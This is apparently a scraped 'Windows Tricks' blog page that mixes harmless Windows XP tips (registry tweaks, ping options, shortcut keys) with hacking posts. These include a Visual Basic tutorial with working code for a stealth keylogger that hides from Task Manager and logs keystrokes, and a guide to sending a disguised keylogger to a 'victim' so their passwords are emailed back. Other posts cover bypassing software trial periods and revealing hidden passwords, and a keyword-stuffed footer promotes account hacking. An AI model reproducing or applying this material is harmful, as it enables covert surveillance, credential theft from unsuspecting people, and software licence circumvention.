Showing posts with label Windows Tricks. Show all posts
Showing posts with label Windows Tricks. Show all posts

To Lock a folder in windows XP without any software.


Make a Folder in C drive rename it as “abc” without quotes.

Now open Command Prompt from Start Menu.

MAGIC FOLDER

Nobody can create a FOLDER anywhere on the
Computer which can be named as 

Fasten Your Browsing Speed To Unimaginable



         If you are using a BroadBand connection at your home and using Windows Xp as your Operating System, and you feel that your BB speed is a bit less, then in that case you have the option to increase your Broadband speed upto 20%.



1. First of all make sure you are logged in as Administrator.
2. Go to Start -> Run -> gpedit.msc, press OK.

How to Hack Password of any Operating System


      One thing any hacker should know is how to hack into login account of any operating system. Major Operating Systems that are used these days are Windows, Linux and Mac. So today I will show you how to hack into these Operating Systems. Are you curious how easy it is for someone to gain access to your computer? If so, read on to see the technique one might use to figure out your computer password.

Disable Turn Off Option and ALT+F4 option


  REGEDIT->HKEY_CURRENT_USER->SOFTWARE->MICROSOFT->WINDOWS->POLICIES->EXPLORER THEN GO TO RIGHT SIDE AND BY RIGHT CLICK OF UR MOUSE CREATE NEW DWORD VALUE WITH NAME NoClose and after creating click on it and give Value Data 1.

Increase XP folder setting


Windows remembers 400 folder settings. When that number is reached some settings aren’t retained any longer. You can change this to 8000 by adding this edit to the registry.
1. Copy the following  into notepad.

Windows Registry Editor Version 5.00

[-HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell NoRoam\BagMRU]
[-HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell NoRoam\Bags]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell]
“BagMRU Size”=dword:00001f40

[HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell NoRoam]
“BagMRU Size”=dword:00001f40

[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer]
“NoSaveSettings”=dword:00000000

2. Save the file as folder8000.reg

3. Double click the file to import into your registry.

Top 5 Free Softwares to Reveal your Asterisk hidden password



http://www.rowan.edu/toolbox/policies/mac_fac/mfk_3.png



A password is a secret word, that provides the access to the resource. As a password does the job of protecting our personals from mail accounts, PDA’s to credit cards and many more.

There might be few situations like you have registered for a services like GTalk, Yahoo Messenger, Live Messenger etc, and in hurry if you just signed in that new account. After a while you may forget the login password for that newly opened account and there it shows the Asterisk key (*****) on the messenger. This is the actual situation where you need these Software tools.
Here is my list of the Top 5 Softwares to Reveal your Asterisk hidden password


  1. Asterisk Key
  2. Password Viewer
  3. Asterisk Logger
  4. Show Password
  5. Password Decryption Software
There 5 are best and free Asterisk Hidden password revealers. Let us check them out Asterisk Key : Uncovers hidden passwords on password dialog boxes and web pages. It provides the State of the art password recovery engine – all passwords are recovered instantly. Best of all, it’s totally free. It supports Multilingual passwords and Full install/uninstall support is provided.
Asterisk Key
Password Viewer : Password Viewer is a Windows utility that allows you to view password fields. It enables to you to peek the password not only at the password edit boxes on different programs, but also the password input field data on a page inside Internet Explorer window ( Win2000 and later )
Password Viewer
Asterisk Logger : Applications, like CuteFTP, CoffeeCup Free FTP, Outlook Express, and others, allows you to type a password for using it in the application. The typed password is not displayed on the screen, and instead of the real password, you see a sequence of asterisk (‘****’) characters. This utility can reveal the passwords stored behind the asterisks in standard password text-boxes.
Asterisk Logger
Show Password : This allows us to view the passwords which are hidden by asteriks. If you find a textbox where there are hidden passwords, which will be replaced with asterisks, these can be easily revealed with this program, only by executing it and moving the cursor over the textbox. It’s good too in 99.99% of cases but the rest 0.01% can be very important for us.
Show Password
Password Decryption Software : Data doctor hidden password unmask utility decode any typed key board character in asterisks form **** of password text box. Recovery software is easy to use, free of cost, user friendly password reveal utility that extract password from password textbox, user login form of yahoo, gmail, hotmail, orkut, messengers and many more.
Password Decryption Software
So what are you waiting for?
Download your favorite tool for revealing your Asterisk hidden password.

How to Uninstall Ghosted Devices from Windows



     Do you know that your computer can be full of Ghosted Devices? And like Humans are scared of real world Ghosts your Computer is also scared of these  Virtual Ghosts. Presence of such ghosts causes  deterioration in the Startup Speed and Overall Computer speed.



In simple language Ghosted Devices, commonly known as Hidden Devices, are those devices that were once connected to the system but are no longer connected. Windows however keeps a copy of them inside the Device Manager and tries to find these devices on system startup, thus reducing the startup speed(often negligible) in some cases.
As an example, lets consider a mouse that you borrowed from a friend, after using it you returned him the next day. When it was first connected, Windows installed the required drivers and when it was removed, Windows marked it as ‘Ghosted Device’. Now since you will probably never use this mouse again, it makes sense to remove it.
The common way of removing the device is to go to Device Manager, view hidden devices, right-click the device(s), hit Uninstall, and wait. Since it can be confusing at some times, this is where GhostBuster comes in. It is a portable tool that can list all Ghosted and Normal devices in one simple list and allows you to remove them in one click.



Please note that these “Ghosted Devices” can be useful as well and is one reason why Windows never looks for drivers every time you connect the device.
Suppose you connect a mouse after a few months after borrowing from a another friend and it turns out to be the same mouse that you borrowed from a friend before. Upon connecting it, you will be able to use the mouse instantly since Windows will not need to re-install the drivers. In layman’s term, the Ghosted device will become activated instantly and thus will not require driver installation again.
Note: Windows has some devices that are ghosted but should NEVER be removed(like devices in the sound, video and game controller class or system and non plug-n-play devices), GhostBuster marks them down as services. Make sure you know which device you are removing, consider this a warning.
It works on Windows XP, Windows Vista, and Windows 7. If you are using Vista or 7, go to Properties and run it in Windows XP compatibility mode.

Want To Avoid Trial Period Expiration Of Softwares?



       Most of us are familiar with many softwares that run only for a specified period of time in the trial mode. Once the trial period is expired these softwares stop functioning and demand for a purchase. But today I will show you how you can run the software beyond their trial period.


How does this work?

Before I tell you how to hack the software and make it run in the trial mode forever, lets understand how this software works
When these softwares are installed for the first time, they make an entry into the Windows Registry with the details such as Installed Date and Time, installed path etc. After installation every time you run the software, it compares the current system date and time with the installed date and time. So, with this it can make out whether the trial period is expired or not.
So with this being the case, just manually changing the system date to an earlier date will not solve the problem. For this purpose there is a small Tool known as RunAsDate.
RunAsDate is a small utility that allows you to run a program in the date and time that you specify. This utility doesn’t change the current system date, but it only injects the date/time that you specify into the desired application.
RunAsDate intercepts the kernel API calls that returns the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime), and replaces the current date/time with the date/time that you specify. It works with Windows 2000, XP, 2003, Vista and 7. It works with 32 bit and 64 bit versions.

To Run your Software Forever follow these Steps Carefully

You have to follow these tips carefully to successfully hack a software and make it run in it’s trial mode forever.
1. Note down the date and time, when you install the software for the first time.
2. Once the trial period expires, you must always run the software using RunAsDate.
3. After the trial period is expired, do not run the software(program) directly. If you run the software directly even once, this hack may no longer work.
4. To avoid any chances of runnung the software program directly, you can delete its shortcut from the desktop and create a new shortcut using runasdate and place it on the desktop.
5. It is better and safe to inject the date of the last day in the trial period.
For example, if the trial period expires on jan 30 2010, always inject the date as jan 29 2010 in the RunAsDate.
Note: This software won’t work with Anti virus as they run in Background.
I hope this helps! Please express your experience and opinions through comments.

DELETE AN UNDELETABLE FILE

Delete An "undeletable" File

Open a Command Prompt window and leave it open.
Close all open programs.
Click Start, Run and enter TASKMGR.EXE


Go to the Processes tab and End Process on Explorer.exe.
Leave Task Manager open.
Go back to the Command Prompt window and change to the directory the AVI (or other undeletable file) is located in.
At the command prompt type DEL where is the file you wish to delete.
Go back to Task Manager, click File, New Task and enter EXPLORER.EXE to restart the GUI shell.
Close Task Manager.


Or you can try this

Open Notepad.exe

Click File>Save As..>

locate the folder where ur undeletable file is

Choose 'All files' from the file type box

click once on the file u wanna delete so its name appears in the 'filename' box

put a " at the start and end of the filename
(the filename should have the extension of the undeletable file so it will overwrite it)

click save,

It should ask u to overwrite the existing file, choose yes and u can delete it as normal


Here's a manual way of doing it. I'll take this off once you put into your first post zain.

1. Start
2. Run
3. Type: command
4. To move into a directory type: cd c:\*** (The stars stand for your folder)
5. If you cannot access the folder because it has spaces for example Program Files or Kazaa Lite folder you have to do the following. instead of typing in the full folder name only take the first 6 letters then put a ~ and then 1 without spaces. Example: cd c:\progra~1\kazaal~1
6. Once your in the folder the non-deletable file it in type in dir - a list will come up with everything inside.
7. Now to delete the file type in del ***.bmp, txt, jpg, avi, etc... And if the file name has spaces you would use the special 1st 6 letters followed by a ~ and a 1 rule. Example: if your file name was bad file.bmp you would type once in the specific folder thorugh command, del badfil~1.bmp and your file should be gone. Make sure to type in the correct extension.

COMMAND PROMPT TRICKS (VERY USEFULL)

create a file that will provide a complete list of files with a particular extension
follow these setps
goto start > run> type cmd

when you enter command prompt
type the following line

dir *.ext /s /b > abc.txt

This command line will create a file called abc.txt. this file will have a list of all the files in that directory and all subdirectories with the .ext extension.
You can then open up this file in any text editor and operate on it.
and also By changing the ext part, you can select different files.
For example, if you wanted to list all of the PDF documents, just type:

dir *.pdf /s /b > abc.txt

compress your data 15% more than normal method

if you compress any file using winrar not much size is reduced



this trick will help you to manage the computer disk space using file compression utilities.


Follow the given steps to compress your data with advanced parameters:
After installation launch winrar, the first screen will appear with many options.


Now right click on your file and then select the option "Add to archive" from the context menu.

Here a window dialog will appear with title "Archive name and parameters".
In General tab, click on "Compression Method" button to select the "Best" option from dropdown menu.
Now select the Advanced tab and click on Compression button to display the advanced compression parameters.
and
Now under the "Text Compression" area,
select "Force" radio button and change the "Prediction order" value to 63 then
change "Memory to use" type to 128.
Now click Ok button to finish the process.
This compression method will help you to compress your data 15% more than normal method.

Where does Window's Product Id get stored

There are two places at least where ProductId gets stored.

1> To see the first place, open Registry by going to START-RUN and entering REGEDIT and Navigate to [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion]. In right pane, look for key by the name "ProductId". This is your Windows Product Id.

OR


2>you can navigate to [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion] and still find same field with the name ProductId.

PEN YOUR CD DRIVE EASILY


hi friends this freeware will be very useful to all of you


If your tray button is not working then you use a pin to open the drive but it is not very convenient to use the pin every time.
So you can use OCTray to open your drive easily.




OCTray is a Freeware using which you can easily open/close your CD/DVD drive.

Double click on the exe file . Doing this will open a window after which you can open your drive by pressing O and close it using C on the keyboard. so easy to use!!!!

OCTray1

Or you can simply double click on the icon in the taskbar and select Open or Close from the context menu.
Download OCTray
note:
If there is a problem with your hardware then you can’t eject your tray even by using this utility.

PING

we use ping to test internet connection
diffrent Ping options

example ..
goto START MENU
> RUN
>TYPE CMD
In DOS .. c:>ping 192.168.0.2 -t

-t Ping the specifed host until interrupted

-a Resolve addresses to hostnames

-n count Number of echo requests to send

-l size Send buffer size

-f Set Don't Fragment flag in packet

-i TTL Time To Live

-v TOS Type Of Service

-r count Record route for count hops

-s count Timestamp for count hops

-j host-list Loose source route along host-list

-k host-list Strict source route along host-list

-w timeout Timeout in milliseconds to wait for each reply

SHORT CUT KEYS FOR WINDOWS MEDIA PLAYER

ALT+1 Adjust zoom to 50 percent
ALT+2 Adjust zoom to 100 percent
ALT+3 Adjust zoom to 200 percent


ALT+ENTER Display the video in full mode
ALT+F Go to media player File Menu
ALT+T Go to media player Tools Menu
ALT+V Go to media player View Menu
ALT+P Go to media player Play Menu
ALT+F4 Use to close media player


CTRL+1 Display media player in full mode
CTRL+2 Display media player in skin mode
CTRL+B Use to play the previous item in media player
CTRL+F Use to play the next item in media player
CTRL+E Use to Eject CD or DVD from CD or DVD drive
CTRL+P Use to Play or Pause the item in media player
CTRL+T Use to Repeat the items in media player
CTRL+SHIFT+B Use to Rewind a file in media player
CTRL+SHIFT+F Use to Fast Forward a file in media player
CTRL+SHIFT+S Use to play items slower than a normal speed
CTRL+SHIFT+ G Use to play items faster than a normal speed
CTRL+SHIFT+ N Use to play items at normal speed in media player
F8 Use to mute the volume in media player
F9 Use to decrease the volume in media player
F10 Use to increase the volume in media player
ENTER or SPACEBAR Use to play an item

INCREASE RAM virtually

Do you face the problem of low virtual memory??????????
Here is one solution for it!.
http://www.askdrtech.com/solutions/image.axd?picture=2009%2F9%2Fram.jpg


To speed up your windows or to increase RAM virtually,
Right click on My Computer
>Properties
> Advanced
> Performance - Settings
> Advanced
> Virtual Memory - Change
Keep the initial size same as recommended and maximum size double of it then finally restart your PC
It will improve speed of windows and you can play some games which require higher RAM.

Retrive Or Reset Windows XP Password

http://1.bp.blogspot.com/_uX_t80IZ5JI/ShbVBK1sIfI/AAAAAAAAAcA/oJbCS9tirB8/s400/winxp_rc_gallery_07.gif

IF U R IN TROUBLE ? LOST YOUR XP LOGIN USERNAME AND PASSWORD

You can get in to another user account if you are using windows administrative account its a simple method !

STEP 1 . CLICK - START MENU !
STEP 2 . TAKE "RUN"
STEP 3 . RUN "mmc" - Microsoft Management Console

There u get a new NEW WINDOW - name Console

STEP 4. Click FILE TAB
STEP 5. TAKE " ADD / REMOVE "
STEP 6. Click " Add.." - (Child window)
STEP 7. "Add Local User and Groups " From the category
STEP 8. THEN CLICK - OK
STEP 9. CLICK USER
Now u can see all USER account
STEP 10. Right Click on any user u want to change !
STEP 11. Choose " Set Password "
STEP 12. Type NEWPASSWORD - and click OK !



Process Over ! Now you can Logout .... then Login with other user ( that u change password ) with Newpassword !

Want To Create Your Own Keylogger? - Novoice Edition (VB Program

http://ahmadyusrie.files.wordpress.com/2010/01/keyboard_typing.jpg

           Before we start programming, we need to answer a basic question: what is a keylogger? As the name implies (key+logger) – a keylogger is a computer program that logs (records) the keys (keyboard buttons) pressed by a user. This should be simple to understand. Lets say that I am doing something at my computer. A keylogger is also running (working) on this computer. This would mean that the keylogger is “listening” to all the keys I am pressing and it is writing all the keys to a log file of some sort. Also, as one might have guessed already, we don’t want the user to know that their keys are being logged. So this would mean that our keylogger should work relatively stealth and must not, in any case, show its presence to the user. Good, now we know what a keylogger as and we have an idea of its functions, lets move on to the next step.


=========================================
Basic Concepts: What needs to be achieved
=========================================
Ok, now lets plan our program, what should such keyloger do and what it should not. Significant difference to previous section is in the sense that here we shall discuss the LOGIC, the instructions that our program will follow.
Keylogger will:
1 – listen to all the key strokes of the user.
2 – save these keys in a log file.
3 – during logging, does not reveal its presence to the user.
4 – keeps doing its work as long as the used is logged on regardless of users actions.
==========================================
Implementation: Converting logic into code
==========================================
We shall use Visual Basic because it is much easier and simple to understand comparing to C++ or Java as far as novice audience is concerned. Although programmers consider it somewhat lame to code in VB but truthfully speaking, its the natural language for writing hacking/cracking programs. Lets cut to the chase – start your VB6 environment and we are ready to jump the ride!
We need a main form, which will act as HQ to the program.
First of all, as our program shall run, we need to make sure it is hidden. This should be very simple to accomplish:
Private Sub Form_Load()
Me.Visisble = False
End Sub
This makes our program invisible to the human eye. To make it invisible to computers eye too, we need to add this line in the Form_Load() event App.TaskVisible = False . This enabled our logger to run in stealth mode and the regular Task Manager will not see our application. Although it will still be possible to see it in the processes tab, there are “ways” to make it hidden. Figure them out yourself, they have nothing to do with programming.
OK, now that our program has run in stealth mode, it should do its essential logging task. For this, we shall be using a whole load of API. These are the interfaces that the Application Platform (windows) itself provides us in those annoying dll files.
There are 3 methods to listen for keys:
* GetAsyncKeyState
* GetKeyboardState
* Windows Hooks
Althought the last method is easier to use, this will not work on Windows98 and also it is NOT very precise. Many people use it, but as my experiences revealed, Keyboard Hooks are only a good way of blocking keys and nothing else. The most exact and precise method in my experience is GetAsyncKeyState().
So lets use this function, but where is that damn thing and how to use it?
Private Declare Function GetAsyncKeyState Lib “USER32″ (ByVal vKey As Long) As Integer
This is how we use a function already present in a dll file. In this case we are using the user32.dll and the function we are using is GetAsyncKeyState(). The arguments (Long vKey), and return value (Long) shall be discussed later, right now its enough to know that this function can listen to keystrokes.
What we need next is to run this function infinitely (as long as the system is running). To do this, just put a Timer control on the form and name it tmrTimer. This timer is used to run the same line of code forever. Note that a while loop with a universally true condition would also accomplish same, but the while loop will certainly hang the system and will lead to its crash as opposed to timer. Timer will not hang the system at all because a while loop tends to carry out the instruction infinitely WITHOUT any break and it also keeps the control to itself, meaning that we cannot do any other job as the loop is running (and with a universally true statement, the while loop will not let the control pass to ANYWHERE else in the program making all the code useless) while the Timer control just carries out the instuction after a set amount of time.
So the two possibilities are:
Do While 1=1
‘our use of the GAKS (GetAsyncKeyState) function Loop
and
Private Sub tmrTimer_Timer()
‘our use of the GAKS function
End Sub
Timer being set, lets move on to see how the GAKS function works and how are we going to use it. Basically what the GAKS function does is that it tells us if a specific key is being pressed or not. We can use the GAKS function like this: Hey GAKS() check if the ‘A’ key is being pressed. And the GAKS function will tell us if it is being pressed or not. Sadly, we can’t communicate with processors like this, we have to use some flamboyant 007 style
If GAKS(65)<>0 Then
Msgbox “The ‘A’ key is being pressed”
Else
Msgbox “The ‘A’ key is not being pressed”
End If

Now lets see how this code works: GAKS uses ASCII key codes and 65 is the ASCII code for ‘A’ If the ‘A’ key is being pressed then GAKS will return a non-zero value (often 1) and if the key is not being pressed then it will return 0. Hence If GAKS(65)<>0 will be comprehended by the VB compiler as “If the ‘A’ key is being pressed”.
Sticking all this stuff together, we can use this code to write a basic functional keylogger:
Private Sub tmrTimer_Timer()
Dim i As Integer
Static data As String
For i = 65 to 90 ‘represents ASCII codes from ‘A’ to ‘Z’
If GAKS(i)<>0 Then data = data & Chr(i)
Next i
If GAKS(32) <> 0 Then data = data & ” ” ‘checking for the space bar
If Len(data)>=100 Then
Msgbox “The last 100 (or a couple more) are these ” & VBNewLine & data
data = “”
End If
End Sub
This alone is enough to create a basic functioning keylogger although it is far from practical use. But this does the very essential function of keylogger. Do try it and modify it to your needs to see how GAKS works and how do the Timer delays affect the functionality of a keylogger. Honestly speaking, the core of our keylogger is complete, we have only to sharpen it now and make it precise, accurate and comprehensive.
The first problem that one encounters using GAKS is that this function is far too sensitive than required. Meaning that if we keep a key pressed for 1/10th of a second, this function will tell us that the key has been pressed for at least 2 times, while it actually was a sigle letter. For this, we must sharpen it. We need to add what I call “essential time count” to this function. This means that we need to tell it to generate a double key press only if the key has been pressed for a specified amount of time. For this, we need a whole array of counters. So open your eyes and listen attentively.
Dim count(0 to 255) As Integer
This array is required for remembering the time count for the keys. i.e. to remember for how long the key has been pressed.
Private Sub tmrTimer_Timer()
Dim i As Integer
Const timelimit As Integer = 10
Static data As String
For i=0 To 255 ‘for all the ASCII codes
If GAKS(i)<>0 Then
If count(i) = 0 Then ‘if the key has just been pressed
data = data & Chr(i)
ElseIf count(i) < timelimit Then
count(i) = count(i) + 1 ‘add 1 to the key count
Else
count(i) = 0 ‘initialize the count
data = data & Chr(i)
End If
Else ‘if the key is not being pressed
count(i) = 0
End If
Next i
End Sub
What we have done here is that we have set a time limit before the GAKS function will tell us that the key is being pressed. This means, in simple words, that if we press and hold the ‘A’ key, the GAKS function will not blindly tell us the ‘A’ key is being pressed, but it will wait for sometime before telling us again that the key is being pressed. This is a very important thing to do, because many users are not very fast typists and tend to press a key for somewhat longer than required.
Now what is left (of the basic keylogger implementation) is just that we write the keys to a file. This should be very simple:
Private Sub timrTimer_Timer()
‘do all the fuss and listen for keystrokes
‘if a key press is detected
Open App.Path & “\logfile.txt” For Append As #1
Print #1, Chr(keycode);
Close #1
End Sub
Note that this is the very basic concept of writing a keylogger, we have yet not added autostart option and neither have we added an post-compile functionality edit options. These are advanced issues for the beginners. If you would like me to write about them, do tell me and I will write about them too, step by step. Please do comment on this article, telling me what it lacks and what was not required in it. Feel free to post this anywhere you like, just make sure you don’t use it for commercial purposes. If you have any questions about any part of it let me know and I will try to answer.

Installing Keylogger In Remote Pc - Novoice Edition

http://www.iconarchive.com/icons/tpdkdesign.net/refresh-cl/256/System-Install-1-icon.png
          In the previous post I shown how to create  keylogger in VB. In this post I am going to show you how to install a Keylogger on a Remote PC without the knowledge of the owner and you will get all the keystroke information through Email.
Note: This article is for educational purpose only and the author won’t be responsible for any kind of damage caused by following the information given in this article.
 


Now to install a Keylogger on a Remote Computer you have to follow the steps given below:
  1. First of all download Winspy keylogger software from link given below:

    http://www.win-spy.com/
  2. After downloading this software, run the .exe. You will be asked to register yourself where you will be asked to enter a Userid and Password. Remember this password as it will be required in uninstalling the software.
  3. Now, another box will come, explaining you the hot keys(Ctrl + Shift + F12) to start the Winspy keylogger software.win spy 1 Installing a Keylogger on a Remote Machine
  4. Now, on pressing hot keys, a login box will come asking userid and password. Enter them and click OK.
  5. Now, Winspy’s main screen will be displayed as shown in image below:winspy 3 Installing a Keylogger on a Remote Machine
  6. Select Remote at top, then Remote install.
  7. On doing this, you will get a popup box as shown in image. Now, fill in the following information in this box.winspy 4 Installing a Keylogger on a Remote Machine

    User – type in the victim’s name
    File name – Name the file to be sent. Use the name such that victim will love to accept it.
    File icon – Keep it the same
    Picture – select the picture you want to apply to the keylogger.
    Email keylog to – Enter your Email address. Hotmail and Yahoo doesnot accept Keylog Files so enter other email address.
    Thats it. This much is enough. If you want, can change other settings also.
  8. After you have completed changing settings, click on “Create Remote file”. Now just add your picture to a winrar archive. Now, what you have to do is only send this keylog file to your victim. When victim will open this file, all keystrokes typed by victim will be sent to your email inbox. Thus, you will get all his passwords and thus will be able to hack his email accounts and even Myspace account password.
So guys, I hope you have got the trick on how to hack any email account passwords from this article. If you have any comment or views about article, feel free to mention it in comments section.

Adds

Note

This site contains many useful things. To join in this site as partner and earn, contact administrator at domesh.radha@gmail.com. You may not use this site to distribute or download any material when you do not have the legal rights to do so. It is your own responsibility to adhere to these terms and the site owner is not responsible in any aspect.Hacking Software, Password hacking Softwares, Hacking Tools, Hacking Psswords Software, Hacking Software Free download, Hacking softwares free download, Free hacking software, Ethical hacking, Computer hacking, Password hacking software, Download hacking software, Orkut hacking software, Bluetooth hacking software, Free password hacking software, Email password hacking software, Download password hacking software, Gmail password hacking software, Yahoo password hacking software, Yahoo hacking software, Email hacking software, Facebook hacking software, Mobile bluetooth hacking software, Free bluetooth hacking software, Password hacking software free download, Mobile hacking software, How to hack facebook accounts, Hack facebook accounts, Bluetooth hack, Super bluetooth hack, How to hack facebook passwords, Hack facebook Passwords, Hack facebook accounts passwords, Facebook hack passwords, Hack hotmail account, Hack facebook password, How to hack facebook password, How to hack a facebook Password, How to hack facebook account password, Hack facebook account password, How to hack a facebook account password, Facebook password hack, Facebook hack password, Hack a facebook password, Hack hotmail password,Hack gmail password, How to hack hotmail password, Hack email, Hack a computer, Hack into facebook account, Super bluetooth hack 2009, How to hack someones facebook account, How to hack yahoo password, Hack yahoo password, Hack yahoo passwords, How to hack into a facebook account, How to hack a yahoo password, Hack a facebook account, Hack msn password, How to hack msn password, hack program, Super bluetooth hack download, Iearn to hack, Hack into someones facebook account, Hack facebook passwords free, Hack yahoo email password, Computer networking, Internet tip, Safety internet tips, Computer repair, Onsite computer repair, Computer support, Buy computer, Slow computer, Computer help, Computer repair services, My computer is slow, Computer troubleshooting, Computer running slow, Computer tech support, Computer slowing down, Computer very slow, Home computer repair, Online computer repair.

Back to TOP